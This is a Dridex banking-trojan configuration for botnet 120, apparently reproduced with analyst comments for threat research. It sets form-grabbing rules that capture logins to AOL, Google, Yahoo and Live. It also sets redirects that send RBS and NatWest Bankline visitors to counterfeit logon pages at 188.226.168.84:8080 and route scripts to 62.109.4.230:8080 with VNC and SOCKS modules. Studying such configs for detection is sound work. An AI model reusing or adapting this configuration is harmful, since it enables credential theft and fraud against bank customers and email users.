- Dridex settings for botnet 120:
- <settings hash="b6c969f81bd2a6352ad6d1fc86f9807d92edac65"> <!-- hash is 40 hex characters (SHA-1 length); what it is computed over is not shown on this page -->
- <httpshots> <!-- URL filters for the screenshot feature, judging by the element name; both rules are deny rules applied on GET and POST (onget="1", onpost="1") -->
- <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url> <!-- excludes static assets: images, CSS, Flash, icons, JS -->
- <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
- </httpshots>
- <formgrabber> <!-- URL filters for form-data capture, judging by the element name. Narrow allow rules for webmail and account logins precede broader deny rules for the same domains, which suggests first match wins; confirm against a bot analysis -->
- <url type="deny">\.(swf)($|\?)</url>
- <url type="deny">/isapi/ocget.dll</url>
- <url type="allow">^https?://aol.com/.*/login/</url> <!-- the dots in aol.com are unescaped here and in several patterns below, so they match any character; account for that if these regexes are reused as detection content -->
- <url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
- <url type="allow">^https?://login.yahoo.com/</url>
- <url type="allow">^https?://login.live.com/</url>
- <url type="deny">^https?://(\w+\.)?aol.com</url> <!-- broad per-domain deny rules start here; they cover the same providers as the allow rules above plus social media sites -->
- <url type="deny">^https?://(\w+\.)?facebook.com/</url>
- <url type="deny">^https?://(\w+\.)?google</url>
- <url type="deny">^https?://(\w+\.)?yahoo</url>
- <url type="deny">^https?://(\w+\.)?youtube.com</url>
- <url type="deny">^https?://(\w+\.)?live.com</url>
- <url type="deny">^https?://(\w+\.)?twitter.com</url>
- <url type="deny">^https?://(\w+\.)?vk.com</url>
- <url type="deny">^https.*ocsp\..+$</url> <!-- from here on the deny rules look like noise suppression: certificate status (OCSP), Safe Browsing, browser telemetry, Skype, and ad or analytics hosts -->
- <url type="deny">^https.*safebrowsing\..+$</url>
- <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
- <url type="deny">^https://s.*\.symcd\.com</url>
- <url type="deny">^https://s.*\.symcb\.com</url>
- <url type="deny">^https.*ocsp2\..+$</url>
- <url type="deny">localhost.+skypectoc/.+$</url>
- <url type="deny">\.messenger\.live\.com</url>
- <url type="deny">pipe\.skype\.com</url>
- <url type="deny">\.optimatic\.com</url>
- <url type="deny">hiro\.tv</url>
- <url type="deny">spotxchange\.com</url>
- <url type="deny">nielsen\.com</url>
- <url type="deny">mapquest\.com </url> <!-- NOTE(review): the pattern text ends with a space before the closing tag; whether the consumer trims it is not visible here -->
- <url type="deny">^https://.+\.skype\.com/api/</url>
- <url type="deny">(//|\.)lphbs.com</url>
- <url type="deny">(//|\.)zynga.com</url>
- </formgrabber>
- <redirects> <!-- each redirect pairs a match string (the element text) with a uri on an external host over plain HTTP; network indicators on this page: 62.109.4.230:8080 and 188.226.168.84:8080 -->
- <redirect name="1st" vnc="0" socks="0" uri="http://62.109.4.230:8080/addons" timeout="20">twister5.js</redirect> <!-- element text is a script file name; presumably requests for it are answered from the uri instead; TODO confirm -->
- <redirect name="2nd" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">commonuifunc.js</redirect> <!-- vnc="1" and socks="1" here, unlike the 1st entry; presumably these switch on the remote-desktop and proxy modules for this entry; TODO confirm -->
- <redirect name="tgp" vnc="1" socks="1" uri="http://62.109.4.230:8080/webuibuilder" timeout="20">notracking.js</redirect>
- <redirect name="rbs_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/rbs_logon/sys.php" timeout="40">https://www.bankline.rbs.com/</redirect> <!-- entry named rbs_fake with a /fakes/rbs_logon/ path, keyed on the RBS Bankline URL; consistent with a counterfeit logon page being served in place of the real site -->
- <redirect name="natwest_fake" vnc="0" socks="0" uri="http://188.226.168.84:8080/fakes/natwest_logon/sys.php" timeout="40">https://www.bankline.natwest.com/</redirect> <!-- same layout as rbs_fake, keyed on the NatWest Bankline URL; both fake entries use timeout="40" where the script entries use 20 -->
- </redirects>
- <httpinjects /> <!-- empty element: this config revision carries no web-inject rules -->
- </settings>